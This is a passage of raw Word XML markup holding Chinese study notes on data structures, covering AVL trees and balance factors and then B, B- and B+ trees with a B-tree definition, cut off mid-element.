          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>平衡二叉查找树，又称</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> AVL</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树。</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>它除了具备二叉查找树的基本特征之外，还具有一个非常重要的特点：它的左子树和右子树都是平衡二叉树，且左子树和右子树的深度之差的绝对值（平衡因子</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不超过</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是说</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AVL</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树每个节点的平衡因子只可能是</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00293C57" w:rsidRPr="009F07BE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（左子树高度减去右子树高度）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122F0E" w:rsidRPr="00122F0E" w:rsidRDefault="00122F0E" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0044617F" w:rsidRPr="00F41A4C" w:rsidRDefault="000D4B42" w:rsidP="000D4B42">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="0044617F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044617F" w:rsidRPr="00F41A4C" w:rsidRDefault="00C111D7" w:rsidP="0044617F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="0044617F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1  </w:t>
      </w:r>
      <w:r w:rsidR="00D70D1A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00D70D1A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00D70D1A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidR="00D70D1A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70D1A" w:rsidRPr="00F41A4C" w:rsidRDefault="00D70D1A" w:rsidP="00D70D1A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>基本结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>(1) B</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="00FD3322">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>二叉搜索树</w:t>
      </w:r>
      <w:r w:rsidR="001A481A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：为空或者左边子节点的</w:t>
      </w:r>
      <w:r w:rsidR="001A481A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidR="006A04EB" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>小于根节点的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>(2) B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="00FD3322">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>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B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树是一种</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>平衡的多路查找树</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，它在文件系统中很有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D153A9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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定义：一棵</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">m </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阶的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树，或者为空树，或为满足下列特性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>m </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>叉树：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>⑴</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树中每个结点至多有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">m </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>棵子树；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>⑵</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>若根结点不是叶子结点，则至少有两棵子树；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D153A9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>⑶</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>除根结点之外的所有非终端结点至少有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">[m/2] </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>棵子树；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>⑷</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所有的非终端结点中包含以下信息数据：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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lastRenderedPageBreak/>
        <w:t>      </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>K1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>K2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
